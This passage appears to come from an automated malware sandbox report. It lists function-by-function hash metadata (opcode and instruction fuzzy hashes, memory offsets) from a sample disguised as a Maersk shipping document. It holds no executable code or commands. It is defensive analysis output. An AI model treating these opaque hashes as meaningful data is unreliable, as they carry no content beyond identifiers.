                                                    • Instruction ID: c1d0ecdc70d3e13b6c5d3ac21254595bc7c27affb6fc21dcfd8266dacbeac0a1
                                                    • Opcode Fuzzy Hash: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                    • Instruction Fuzzy Hash: 6E115B71A0021DABDB15EF68C884EAEBBB5FB48344F004099F901D7354DB34EA51CB90
                                                    Function 0182C97C Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                    • Instruction ID: 456ce743c5963510943ef09efe4cfc9ba414342650897cd57c77e96a77438be2
                                                    • Opcode Fuzzy Hash: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                    • Instruction Fuzzy Hash: 371179B16083089FC700DF69D445A9BBBE4EF98710F00495AF998D7394E630E910CB92
                                                    Function 01874A80 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                    • Instruction ID: 778652bf19f93ab913ad58114e2ab6cbbe6a9ed10f292e22eeda1e2c0eb54283
                                                    • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                    • Instruction Fuzzy Hash: C701D4322046059FD721AA6DD844F96FBEAFBC6710F044819E642CB694DAB0F980CB94
                                                    Function 0182CA11 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                    • Instruction ID: e3fda973c27d22fb555ea3327d1fb1649ccfe02a59a1359fc86dc1556211b01b
                                                    • Opcode Fuzzy Hash: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                    • Instruction Fuzzy Hash: 0F1179B1608308AFC700DF69D445A5FBBE4FF99750F00895AF958D73A4E630E940CB92
                                                    Function 017BE016 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                    • Instruction ID: f50dc0db9714d40d4d3ce2a84ddc27b10686eb8338f84ef8c713ac9d4ae17cb4
                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                    • Instruction Fuzzy Hash: 0B018F322045809FE322871DCA88FA7FBE8EF45754F1904A5FA05CB791DB38DC40C621
                                                    Function 0179826B Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                    • Instruction ID: 1ac5714d2bb1d74203365c20e18a5c0a9fe02b5cf4aba9d4028d318517b2ffa9
                                                    • Opcode Fuzzy Hash: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                    • Instruction Fuzzy Hash: 8D01A731704509DFDB14EB6DEC089AEF7E9FF45620B5940A9DA01DB784DE20DE05C792
                                                    Function 0184EB50 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                    • Instruction ID: eb2dafd24bea922aad8f62db26dc2c0e314bee3d80d9dadd0c27b9aedc98bf52
                                                    • Opcode Fuzzy Hash: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                    • Instruction Fuzzy Hash: E101F271240709AFD3315F19D884F46BAA8EF54B50F14082EB706DF394DBB5AA408B64
                                                    Function 017A2582 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                    • Instruction ID: e45be4a676e48b75aece5dd80c8da7d1c99d141597bbebbf6988d41010120109
                                                    • Opcode Fuzzy Hash: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                    • Instruction Fuzzy Hash: A1F0F432A42A10B7C732DB5ACC84F47FAAAEBC4B90F104168E60597640DA30ED01DAA0
                                                    Function 017CC073 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction ID: 6a612bfd5dc0a874a068c723d09c5be26afb461f7add8819685449071895558c
                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction Fuzzy Hash: 7FF0C2B3600611ABD325CF4DDC40E57FBEADBD5B80F04812CA609CB220EA31ED04CB90
                                                    Function 0179C310 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction ID: 14d911da17c942933627f544b3e712701d0f0fad72acca80d0e3963ecad6b01d
                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction Fuzzy Hash: A0F0FC332046639BDF3316596844B6BE9958FD5A64F190035E30D9B244CA608D0956D2
                                                    Function 0187634F Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcd5e383b7656fc209009ee393b574c0f165574a3117f133d19e2529bdabe881
                                                    • Instruction ID: 46b55b76c024957dbd74d0417d10cf22282063f32644dc8fb1b7e9c3da5962eb
                                                    • Opcode Fuzzy Hash: dcd5e383b7656fc209009ee393b574c0f165574a3117f133d19e2529bdabe881
                                                    • Instruction Fuzzy Hash: 7F017C71A10209AFDB00DFA9E844AAEBBF8FF58304F10406AF900E7350D634DA00DBA0
                                                    Function 018762D6 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89f4bc115a23a1809fe1a173a861d71f23dc2c47d48d9572355f7d0159ac6503
                                                    • Instruction ID: 7f54b89343ada672096a8ddad1c9f638ee116ef957d1742527bafdc474f8cdbb
                                                    • Opcode Fuzzy Hash: 89f4bc115a23a1809fe1a173a861d71f23dc2c47d48d9572355f7d0159ac6503
                                                    • Instruction Fuzzy Hash: F5012C71A00209AFDB04DFA9E445AAEBBF8EF58704F50406AE915E7390D674DA01CBA0
                                                    Function 0187625D Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd6165db3ecbedce4bd12c1b6b9434f6846a45c7912a5c5b49f3d81f43e754f9
                                                    • Instruction ID: 2c123fb36c071c29ece919653f1725c4ee5c00735849ec74028a2e550bb8cb86
                                                    • Opcode Fuzzy Hash: fd6165db3ecbedce4bd12c1b6b9434f6846a45c7912a5c5b49f3d81f43e754f9
                                                    • Instruction Fuzzy Hash: 49017C71A1020AAFDB04DFA9D485AAEB7F8EF58304F14406AF904E7350D674EA008BA0
                                                    Function 017DCA6F Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                    • Instruction ID: a46c41a14af5b50bbe402efdf94818c698ff9c256db342a9256499ba7be68e51
                                                    • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                    • Instruction Fuzzy Hash: 5201F9326406899BD323971DCC49F59FBACEF82754F0944A9FA04DB691DB74CA40C211
                                                    Function 018761E5 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                    • Instruction ID: 2f79e4e4e7461e6e5d80897eed723f8d66b270eb29a83c1c0961e6103723f6ce
                                                    • Opcode Fuzzy Hash: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                    • Instruction Fuzzy Hash: BC018F71A10249AFDB00DFA9D845AEEBBF8BF58314F14005AE505E7280E734EA01CB94
                                                    Function 018263C0 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction ID: 6afa0901f4cf4c36c1126d5d1e64ca5639833494c4d1788abb7e1bfdc6bfff82
                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction Fuzzy Hash: 5DF0127210001DBFEF029F94DD80DEF7B7DFB55798B104129FA1192160D635DE21A7A0
                                                    Function 0182A4B0 Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                    • Instruction ID: 1cf266568112b5c696127f77aeb16c22e1879d5c51c459c2c7eda7468499cca5
                                                    • Opcode Fuzzy Hash: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                    • Instruction Fuzzy Hash: 9C018936100119ABCF129E84D940EDA7F66FF4C754F058106FE18A6620C336DAB0EF81
                                                    Function 0179C0F0 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                    • Instruction ID: 6c43804fc8bf9bf494a4c08e88f308b692cadb5de56a1ed1831b0875df8ac413
                                                    • Opcode Fuzzy Hash: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                    • Instruction Fuzzy Hash: 07F024F22882415BFF169619AC05B32F69AE7C0650F65807AEB058B2D1EA70DC0583A8
                                                    Function 017D656A Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                    • Instruction ID: 4a2e2e4f72588d2f76a78f9c9320bf034a240cd84f3bfe4d022c9ac607b15a83
                                                    • Opcode Fuzzy Hash: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                    • Instruction Fuzzy Hash: 2501A4712006859BE3239B6CCD48F65B7E8BB40B04F980594FA02CB6DAD768D6C18610
                                                    Function 0184437C Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction ID: 02ba3e093b89021263a7f2f5cfc39d1cbbb592f76194347b4136160494e29f6c
                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction Fuzzy Hash: 38F0AE37341E1747E776AA2D9414F2FE695AF90F51F05052CA556CB640DF60DD01C790
                                                    Function 0182C89D Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                    • Instruction ID: 6bc764c4d7d44ffd304cfff4cb6852ca3ab287a8a6c9766d5646139e6e34d87b
                                                    • Opcode Fuzzy Hash: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                    • Instruction Fuzzy Hash: 06F0A4706053049FC310EF28C445E2EB7E4FF58714F40465AB894DB394E634EA00C756
                                                    Function 0182E872 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction ID: bcba071f42b0064f1205c7a29a63c533f9fc3e14841c31f1a46402d8c438929d
                                                    • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction Fuzzy Hash: EAF054337115219BD3329A4ECCC0F16B768AFD5B60F190465EA54DB264C7A0ED8187D4
                                                    Function 017D0854 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction ID: 99dd0bb410a2787ffd581fb0ebf0e87224e8061264122b0ff0a249861019dd9e
                                                    • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction Fuzzy Hash: 0AF02472600204AFE714DB21CD06F86F7F9EF98300F148078A545C7164FAB0ED10C654
                                                    Function 0182C912 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                    • Instruction ID: 94e3ede71048611eb505aa6b0d60509d85833652ac7dd53dc13b29f197d9c6e2
                                                    • Opcode Fuzzy Hash: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                    • Instruction Fuzzy Hash: 28F04F70A01249AFCB04EF69D559EAEB7F4EF18344F008055A955EB395DA34EB01CB50
                                                    Function 017A47FB Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                    • Instruction ID: 09648bd036a9eb067ef1f1ee50114b07f31a8f397193437fba34f2ee9f41869e
                                                    • Opcode Fuzzy Hash: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                    • Instruction Fuzzy Hash: 16F024319962E08FE736CB1CE044B21FBC49B80630F8C4B6AC54B83102C3A1E880C611
                                                    Function 01860115 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                    • Instruction ID: 97f346df34b90fcdcf59a4d8a1d9842a333d72946d1f7e4c8b9849ddc4a1cf34
                                                    • Opcode Fuzzy Hash: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                    • Instruction Fuzzy Hash: 32F02726415A8086CF335B3C64503D16B58E741314F2D1045EDA0D7206D5748B83C729
                                                    Function 017DC5ED Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                    • Instruction ID: eea122ec1d062aef45c7e61260f658f3659cc8eb95c2e650e1184a3740e4ce42
                                                    • Opcode Fuzzy Hash: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                    • Instruction Fuzzy Hash: 0EF0EC725256999FE7239B2CC148B61FBF8AB017B0F1C986EE506C7512C360E880CA61
                                                    Function 017E2619 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction ID: a3f8b1357714e489ed819792044ec0cfde2be78becaa54882413dc40ba870679
                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction Fuzzy Hash: F2E0D8723406012BE7129F598CC8F47BBEEDFDAB10F040479B6045F256CAE2DD0986A4
                                                    Function 01836030 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                    • Instruction ID: cb7ffc22c819291c1065909938b6ca0f5276911b2babccc8146a092e322a93d6
                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                    • Instruction Fuzzy Hash: B5F08C72100204AFE3219F09D885B52F7B8EB55368F19C025E608EB160E37AEE40CBA0
                                                    Function 017A0710 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                    • Instruction ID: 4e2ade01b4be75fdd48585a218aaae22a636bf4b46ed9bcc435e7978fcbc03d7
                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                    • Instruction Fuzzy Hash: 02F0E5392043459BDB1ACF19C040A95FFA4FB81360B010498FD428B311DB31E981CB51
                                                    Function 017D49D0 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                    • Instruction ID: 5dab6623c24b48b49ca6971a1e1fcf6c9e80c5844c79a22d76a847c3ba70728d
                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                    • Instruction Fuzzy Hash: 12E0D83224414DABD3311A69C808B66F7B5EBD47A0F160429E242AB958DB70DD40C7D9
                                                    Function 01874164 Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f17b1cbef2fafde2a9b7ec49d3efcc7b76b2f6f6c7d9930425e7381dcf51e9d2
                                                    • Instruction ID: dc50bb07301ab1a0ba7500389153be8edf953710e81d732010e2684b3b011802
                                                    • Opcode Fuzzy Hash: f17b1cbef2fafde2a9b7ec49d3efcc7b76b2f6f6c7d9930425e7381dcf51e9d2
